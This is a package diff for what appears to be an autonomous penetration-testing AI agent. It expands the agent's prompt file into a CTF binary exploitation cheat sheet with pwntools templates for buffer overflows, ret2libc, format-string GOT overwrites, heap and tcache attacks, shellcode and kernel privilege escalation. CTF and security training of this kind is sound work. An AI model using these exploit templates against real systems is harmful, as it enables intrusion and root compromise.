pentesting 0.24.2 → 0.24.4

package/dist/prompts/techniques/pwn.md

@@ -1,6 +1,9 @@
-# Binary Exploitation (Pwn) Techniques
+# Binary Exploitation (Pwn) — Comprehensive CTF Guide
+
+> **Cross-ref**: exploit.md (shell strategy), evasion.md (bypass), shells.md (shell types)
+
+## Phase 0: Recon — Identify Protections
 
-## Recon — Identify Protections
 ```
 Before exploiting, understand what you're dealing with:
 ├── file <binary>           → architecture, linking, stripped?
@@ -10,117 +13,399 @@ Before exploiting, understand what you're dealing with:
 ├── strace ./<binary>       → system calls
 ├── readelf -s <binary>     → symbol table
 ├── objdump -d <binary>     → disassembly (or use radare2/Ghidra)
-└── ldd <binary>            → linked libraries + ASLR check
+├── ldd <binary>            → linked libraries + ASLR check
+└── readelf -l <binary>     → segment permissions (RWX = shellcode!)
+```
+
+### Protection Cheat Sheet
+```
+Protection    Bypass Strategy
+──────────    ─────────────────────────
+No NX         → Shellcode on stack/heap
+NX enabled    → ROP (ret2libc, ret2win, ret2csu, ret2dlresolve)
+No PIE        → Hardcoded addresses work directly
+PIE enabled   → Need address leak first, then calculate offsets
+No Canary     → Direct buffer overflow
+Canary        → Leak canary via format string, brute-force (forking server)
+Partial RELRO → GOT overwrite possible
+Full RELRO    → GOT read-only, use __malloc_hook/__free_hook or stack
+No ASLR       → Fixed addresses (check: cat /proc/sys/kernel/randomize_va_space)
+ASLR          → Leak libc/stack/heap base, ret2plt, partial overwrite
+FORTIFY       → Some format string restrictions, limited buffer overflow
 ```
 
 ## Stack Buffer Overflow
+
 ```
 Classic BOF flow:
 1. Find overflow length:
    python3 -c "print('A'*100)" | ./<binary>
-   → Use pattern_create to find exact offset:
+   → Use cyclic pattern to find exact offset:
+   # Pwntools (preferred):
+   from pwn import *
+   cyclic(200)          # generate pattern
+   cyclic_find(0x6161616b)  # find offset from crash value
+
+   # MSF:
    msf-pattern_create -l 200
    msf-pattern_offset -q <EIP_value>
 
-2. Control EIP:
+2. Control EIP/RIP:
    python3 -c "print('A'*offset + 'BBBB')" | ./<binary>
    → EIP should be 0x42424242
 
 3. Find return address:
-   ├── No NX: JMP ESP in binary or libc
+   ├── No NX: JMP ESP/RSP in binary or libc
    │   objdump -d <binary> | grep "jmp.*esp"
    ├── NX enabled: ROP (Return Oriented Programming)
    └── ASLR: ret2libc or leak libc address
 
 Pwntools template:
 from pwn import *
-p = process('./<binary>')  # or remote('host', port)
+context.binary = elf = ELF('./<binary>')
+# p = process(elf.path)     # local testing
+p = remote('host', port)    # remote exploit
+
 offset = <N>
-payload = b'A' * offset
-payload += p64(ret_addr)   # or p32 for 32-bit
-payload += <shellcode_or_rop>
+payload = flat(
+    b'A' * offset,
+    elf.symbols['win_function'],   # or ROP chain
+)
 p.sendline(payload)
 p.interactive()
 ```
 
 ## Return Oriented Programming (ROP)
+
 ```
 When NX is enabled (no shellcode execution on stack):
 
 Find gadgets:
 ├── ROPgadget --binary <binary> --ropchain
 ├── ropper -f <binary> --search "pop rdi"
-└── Common gadgets: pop rdi; ret, pop rsi; ret, ret (for alignment)
+├── pwntools: ROP(elf).find_gadget(['pop rdi', 'ret'])
+└── Common gadgets: pop rdi; ret, pop rsi; pop r15; ret, ret (alignment)
 
-ret2libc:
-├── Leak libc address → calculate system() and "/bin/sh" offsets
-├── Pwntools: libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
-│   system_addr = libc.symbols['system']
-│   bin_sh = next(libc.search(b'/bin/sh'))
-└── Payload: pop_rdi + bin_sh + system
+═══════════════════════════════════════
+ret2libc (Most Common ROP in CTF):
+═══════════════════════════════════════
+1. Leak libc address:
+   ├── GOT leak via puts/printf: call puts@plt(got['puts'])
+   ├── Format string: %p leak stack/libc pointers
+   └── Info leak via other vuln
+2. Calculate libc base:
+   libc_base = leaked_addr - libc.symbols['puts']
+3. Build payload:
+   system = libc_base + libc.symbols['system']
+   bin_sh = libc_base + next(libc.search(b'/bin/sh'))
+   pop_rdi = <gadget_addr>
+   # 64-bit: pop rdi; ret → /bin/sh → system
+   # Alignment: add extra 'ret' gadget before system if needed
+
+Pwntools automated:
+from pwn import *
+elf = ELF('./<binary>')
+libc = ELF('./libc.so.6')  # or target libc
+rop = ROP(elf)
+rop.call('puts', [elf.got['puts']])  # leak
+rop.call(elf.symbols['main'])         # return to main for stage 2
 
-ret2win pattern:
+═══════════════════════════════════════
+ret2win (Simplest):
+═══════════════════════════════════════
 ├── Find a "win" function (prints flag, spawns shell)
 ├── Payload: padding + win_function_address
-└── With PIE: Need a leak first, then calculate offset
+├── With PIE: Need a leak first, then calculate offset
+└── Check: objdump -t <binary> | grep -i "win\|flag\|shell\|cat"
+
+═══════════════════════════════════════
+ret2csu (When Gadgets Are Scarce):
+═══════════════════════════════════════
+├── __libc_csu_init has universal gadgets for rdi, rsi, rdx
+├── Two-stage: set registers via csu pop, then call function
+└── web_search("ret2csu tutorial") for detailed gadget chains
+
+═══════════════════════════════════════
+ret2dlresolve (No Libc Needed):
+═══════════════════════════════════════
+├── Forge fake relocation entry to resolve arbitrary function
+├── pwntools: Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
+└── Works even without libc leak — powerful when binary is minimal
+
+═══════════════════════════════════════
+SROP (Sigreturn Oriented Programming):
+═══════════════════════════════════════
+├── Use sigreturn syscall to set ALL registers at once
+├── Pwntools: SigreturnFrame() — set rip, rsp, rax, etc.
+├── Need: syscall gadget + sigreturn number in rax (0xf on x86_64)
+└── Extremely powerful — single gadget controls entire register state
 ```
 
 ## Format String Vulnerability
+
 ```
 Detection: Send %x.%x.%x.%x → if hex values appear, vulnerable
 
+═══════════════════════════════════════
 Read memory:
-├── %p.%p.%p... → leak stack values (find canary, addresses)
+═══════════════════════════════════════
+├── %p.%p.%p... → leak stack values (find canary, addresses, libc)
 ├── %N$p        → read Nth argument directly
-└── %s          → read string at address on stack
+├── %s          → read string at address on stack
+└── Find useful leaks:
+    ├── Stack canary (8 bytes, ends with \x00)
+    ├── Libc addresses (0x7f... on 64-bit)
+    ├── PIE base (calculate from code pointers)
+    └── Heap addresses
 
-Write memory (overwrite GOT, return address):
-├── %n → writes number of characters printed so far
-├── %N$n → write to Nth argument
-├── %hn → write 2 bytes (short)
-├── %hhn → write 1 byte
-└── Pwntools fmtstr_payload: simplifies format string writes
+═══════════════════════════════════════
+Write memory (overwrite GOT, return address, hooks):
+═══════════════════════════════════════
+├── %n    → writes number of characters printed so far (4 bytes)
+├── %N$n  → write to Nth argument
+├── %hn   → write 2 bytes (short) — most used
+├── %hhn  → write 1 byte — most precise
+└── Targets:
+    ├── GOT entry (redirect function to win/system/one_gadget)
+    ├── __malloc_hook / __free_hook (trigger via malloc/free)
+    ├── Return address on stack
+    ├── .fini_array (called at exit)
+    └── atexit handlers
 
-Pwntools:
+═══════════════════════════════════════
+Pwntools automation:
+═══════════════════════════════════════
 from pwn import *
-p = process('./<binary>')
+# Automatic format string exploit
 payload = fmtstr_payload(offset, {target_addr: desired_value})
+# Advanced: write multiple values
+payload = fmtstr_payload(offset, {
+    elf.got['printf']: elf.symbols['win'],   # redirect printf→win
+})
 p.sendline(payload)
 ```
 
 ## Heap Exploitation
+
 ```
-Common techniques:
-├── Use After Free (UAF): allocate → free → allocate same size → use old pointer
-├── Double Free: free same chunk twice → overlapping allocations
-├── Heap Overflow: overflow into next chunk metadata
-├── Tcache poisoning (glibc 2.26+): corrupt tcache fd pointer
+═══════════════════════════════════════
+Fundamental Heap Techniques:
+═══════════════════════════════════════
+
+Use After Free (UAF):
+├── allocate → free → allocate same size → use old pointer
+├── The new allocation reuses freed chunk's memory
+├── If old pointer is still accessible → read/write freed data
+└── Key: control what gets allocated in the freed slot
+
+Double Free:
+├── free(A) → free(B) → free(A) → now A is in freelist twice
+├── Allocate: get A → write fd pointer → allocate → allocate (arbitrary addr!)
+├── GLIBC 2.29+: key field check → need to overwrite key or use different bins
+└── Bypass: tcache count tampering, or use fastbin (if >= 7 chunks in tcache)
+
+Heap Overflow:
+├── Overflow into next chunk's metadata (size, fd, bk)
+├── Modify size → overlapping chunks → controlled overlap
+├── Null byte overflow: shrink next chunk → unlink attack
+└── Off-by-one: even 1 byte overflow can be lethal
+
+═══════════════════════════════════════
+Tcache Attacks (glibc 2.26-2.35):
+═══════════════════════════════════════
+Tcache poisoning:
+├── Corrupt tcache entry's fd pointer → arbitrary allocation
+├── GLIBC 2.32+: Safe-linking (PROTECT_PTR) → need heap base leak
+│   fd = (chunk_addr >> 12) ^ target_addr   ← key formula!
+├── Allocate at: __free_hook, __malloc_hook, GOT, stack
+└── Once arbitrary write: system("/bin/sh") or one_gadget
+
+Tcache count manipulation:
+├── Overflow into tcache_perthread_struct (at heap base)
+├── Set counts[size_index] to allow more frees or skips
+└── Enables double-free even on newer glibc
+
+═══════════════════════════════════════
+Fastbin Attacks (legacy, still relevant):
+═══════════════════════════════════════
 ├── Fastbin dup: double free in fastbin → arbitrary write
-└── House of Force: corrupt top chunk size → arbitrary allocation
+├── Size check: target must have valid fastbin size in header
+├── Align to 0x7f byte in __malloc_hook area (libc)
+└── Used when tcache is full (7+ chunks of same size freed)
+
+═══════════════════════════════════════
+Unsorted Bin Attacks:
+═══════════════════════════════════════
+├── Unsorted bin leak: free large chunk → fd/bk points to main_arena
+├── main_arena is at known offset from libc base → libc leak!
+├── Unsorted bin attack (glibc <2.29): corrupt bk → write main_arena addr
+└── Size: must be ≥ 0x90 to avoid fastbin/tcache
+
+═══════════════════════════════════════
+Large Bin Attack:
+═══════════════════════════════════════
+├── Corrupt large bin fd_nextsize/bk_nextsize
+├── Write heap address to arbitrary location
+├── Useful for: overwrite mp_.tcache_bins, global_max_fast
+└── Enables further exploitation chain
+
+═══════════════════════════════════════
+House Techniques (Named Patterns):
+═══════════════════════════════════════
+├── House of Force → corrupt top chunk size → allocate to target
+├── House of Spirit → forge fake chunk → free it → allocate at target
+├── House of Lore → small bin corruption → arbitrary allocation
+├── House of Orange → forge unsorted bin chunk from top chunk
+├── House of Botcake → tcache + unsorted bin overlap (2.31+)
+├── House of Pig → largebin + tcache stashing → arbitrary write
+├── House of Banana → rtld_global abuse for exit-time RCE
+├── House of Kiwi → _IO_FILE vtable abuse (2.35+)
+└── house of XXX → web_search("house of XXX heap exploitation")
 
-Debug with gdb + gef/pwndbg:
-├── heap bins → show free chunk bins
-├── heap chunks → show all chunks
-├── vis_heap_chunks → visual heap layout
-└── x/20gx <addr> → examine memory
+═══════════════════════════════════════
+Debugging heap with gdb:
+═══════════════════════════════════════
+Use pwndbg or gef (NOT plain gdb):
+├── heap            → overview of all chunks
+├── bins            → show free chunk bins (tcache, fast, unsorted, small, large)
+├── vis_heap_chunks → visual heap layout (color-coded)
+├── tcachebins      → tcache entries per size
+├── fastbins        → fastbin entries
+├── x/20gx <addr>   → examine raw memory
+└── find_fake_fast <addr> → find valid fastbin sizes near target
 ```
 
 ## Shellcode
+
 ```
 When NX is disabled (rare in modern, common in CTF):
-├── msfvenom -p linux/x64/exec CMD="/bin/sh" -f python
-├── pwntools: shellcode = asm(shellcraft.sh())
-├── Avoid null bytes: Use alternative instructions
-│   xor eax, eax (instead of mov eax, 0)
-└── Size constraints → use short shellcode or staged
+
+Generate:
+├── pwntools: shellcode = asm(shellcraft.sh(), arch='amd64')
+├── msfvenom -p linux/x64/exec CMD="/bin/sh" -f python -b '\x00'
+├── Custom: smaller/badchar-free shellcode
+└── Staged: small shellcode reads larger shellcode from stdin
+
+Constraints:
+├── Avoid null bytes: xor rax, rax (not mov rax, 0)
+├── Size limit: use short shellcode (shell in ~30 bytes possible)
+├── Alphanumeric: use AE64 encoder for alphanum-only shellcode
+├── Seccomp: check allowed syscalls with seccomp-tools dump ./<binary>
+│   ├── open+read+write only → read flag file to stdout
+│   ├── No execve → openat + sendfile or mmap
+│   └── Pwntools: shellcraft.open('flag.txt') + shellcraft.read(3, 'rsp', 100) + shellcraft.write(1, 'rsp', 100)
+└── Write+Execute memory (mprotect): change stack/heap to RWX first
+```
+
+## Advanced: One-Gadget and Magic Gadgets
+
+```
+one_gadget: single address in libc that spawns shell
+├── Tool: one_gadget libc.so.6
+├── Usually has constraints: [rsp+0x40] == NULL, etc.
+├── When to use: anytime you can redirect execution to libc
+│   ├── __malloc_hook overwrite → trigger via malloc
+│   ├── __free_hook overwrite → trigger via free
+│   ├── GOT overwrite → trigger when function is called
+│   ├── .fini_array overwrite → trigger at exit
+│   └── Return address overwrite → trigger at function return
+└── Try ALL one_gadgets — first one often doesn't work due to constraints
+```
+
+## Kernel Exploitation (Advanced CTF)
+
+```
+Common kernel pwn patterns:
+├── Use after free in kernel module → overwrite function pointer
+├── Race condition (TOCTOU) → exploit copy_from_user race
+├── Stack overflow in ioctl handler → kernel ROP
+├── Integer overflow → buffer size miscalculation
+└── NULL pointer dereference (if mmap_min_addr = 0)
+
+Privilege escalation:
+├── commit_creds(prepare_kernel_cred(0)) → instant root
+├── modprobe_path overwrite → trigger via unknown file format
+├── struct cred overwrite → change uid/gid to 0
+└── Namespace escape → ns_capable bypass
+
+Protection bypass:
+├── KASLR: leak kernel addresses (dmesg, /proc/kallsyms, info leak)
+├── SMEP/SMAP: use kernel gadgets only (no userspace exec)
+├── KPTI: KPTI trampoline for return to userspace
+└── Stack canary: leak via info leak or race
+```
+
+## Pwntools Essential Patterns
+
+```python
+from pwn import *
+
+# Setup
+context.binary = elf = ELF('./<binary>')
+context.log_level = 'debug'  # verbose for debugging
+libc = ELF('./libc.so.6')
+
+# Connection
+p = process(elf.path)                    # local
+p = remote('challenge.ctf.example', 1337)  # remote
+p = gdb.debug(elf.path, 'b main')       # with gdb
+
+# I/O
+p.sendline(b'input')
+p.sendafter(b'prompt: ', b'input')
+p.recvuntil(b'Address: ')
+leak = int(p.recvline().strip(), 16)
+
+# Packing
+p64(0xdeadbeef)     # 64-bit little-endian
+p32(0xdeadbeef)     # 32-bit little-endian
+u64(b'\x00' * 8)    # unpack 8 bytes to int
+
+# ROP
+rop = ROP(elf)
+rop.call('puts', [elf.got['puts']])
+rop.call('main')
+print(rop.dump())
+
+# Libc
+libc.address = leaked_puts - libc.symbols['puts']
+system = libc.symbols['system']
+bin_sh = next(libc.search(b'/bin/sh\x00'))
+
+# DynELF (automatic libc resolution without libc file)
+d = DynELF(leak_func, elf=elf)
+system = d.lookup('system', 'libc')
+```
+
+## Libc Database Lookup
+
+```
+When you leak a libc address but don't know which libc version:
+├── libc.rip       → search by function address suffix
+├── libc-database  → github.com/niklasb/libc-database
+├── web_search("libc database online lookup")
+└── Pwntools: from pwn import *; libc = LibcSearcher('puts', leaked_addr)
+
+Once identified:
+├── Download matching libc.so.6
+├── libc = ELF('./libc.so.6')
+├── libc.address = leak - libc.symbols['known_function']
+└── Now all offsets (system, /bin/sh, one_gadget, hooks) are calculable
 ```
 
 ## Common CTF Pwn Patterns
+
 ```
-├── gets() / scanf("%s") → always overflows → classic BOF
-├── printf(user_input) → format string → read/write memory
-├── Custom malloc → heap challenge → find corruption primitive
-├── seccomp → restricted syscalls → use allowed ones (open/read/write)
-├── Binary with SUID bit → exploit → get that user's privileges
-└── Server binary on remote port → connect and exploit live
+Vulnerability → Exploitation Flow:
+├── gets() / scanf("%s")  → always overflows → classic BOF → ROP/ret2libc
+├── printf(user_input)    → format string → leak + arbitrary write
+├── Custom malloc manager → heap challenge → find corruption primitive
+├── Menu-driven program   → heap note challenge → UAF/double-free/overflow
+├── seccomp-restricted    → ORW (open-read-write) shellcode chain
+├── PIE + Canary + NX     → need 2 vulns: leak (fmtstr) + overflow
+├── Forking server        → brute-force canary byte-by-byte (no ASLR reset)
+├── Stack pivot           → leave; ret → redirect RSP to controlled buffer
+├── Partial overwrite     → overwrite last 1-2 bytes of return addr (bypass PIE partially)
+├── SUID binary           → exploit → get that user's privileges
+└── Server binary on port → connect and exploit live
 ```

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.24.2",
+  "version": "0.24.4",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",
@@ -29,7 +29,7 @@
     "release:minor": "npm version minor && npm run build && npm run publish:token",
     "release:major": "npm version major && npm run build && npm run publish:token",
     "release:docker": "docker buildx build --platform linux/amd64,linux/arm64 -t agnusdei1207/pentesting:latest --push .",
-    "check": "TMPDIR=/tmp npm run test && npm run build && npm run release:docker"
+    "check:docker": "TMPDIR=/tmp npm run test && npm run build && npm run release:docker && bash test.sh"
   },
   "repository": {
     "type": "git",